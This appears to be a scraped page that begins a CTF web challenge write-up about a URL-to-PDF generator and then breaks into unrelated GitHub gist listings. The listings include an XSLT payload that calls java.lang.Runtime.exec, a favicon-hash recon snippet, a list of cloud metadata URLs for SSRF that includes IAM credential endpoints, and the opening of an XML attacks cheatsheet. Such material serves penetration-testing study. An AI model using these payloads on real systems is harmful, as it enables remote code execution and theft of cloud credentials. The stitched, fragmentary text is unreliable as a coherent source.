Category: Web Difficulty: Easy
We were offered a website that generates a pdf from a given URL.
- Enter a URL and submit
thanatoskira
/ select.xslt
Last active
January 25, 2024 16:10
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> | |
| <xsl:template> | |
| <!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; --> | |
| <!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; --> | |
| <!-- #114 Utf8: open -a calculator --> | |
| <!-- #115 String: touch /tmp/pwn --> | |
| <xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/> | |
| <xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/> | |
| <!-- #132 Utf8: <init> --> | |
| <AAA select="<init>"/> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # https://twitter.com/brsn76945860/status/1171233054951501824 | |
| pip install mmh3 | |
| ----------------------------- | |
| # python 2 | |
| import mmh3 | |
| import requests | |
| response = requests.get('https://cybersecurity.wtf/favicon.ico') | |
| favicon = response.content.encode('base64') |
ast3ro
/ insomni-hack-2019-03-22-web-ezgen-writeup.md
Created
March 26, 2019 14:58
insomni-hack-2019-03-22-web-ezgen-writeup.md
wildjcrt
/ verify_and_decrypt_session_cookie60beta1.rb
Last active
February 11, 2024 16:17
— forked from inopinatus/verify_and_decrypt_session_cookie52.rb
Decrypt Rails 6.0 beta session cookies
jhaddix
/ cloud_metadata.txt
Last active
April 30, 2024 09:38
— forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
jordanpotti
/ xml-attacks.md
Created
December 7, 2017 13:11
— forked from mgeeky/xml-attacks.md
XML Vulnerabilities and Attacks cheatsheet
XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.
The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.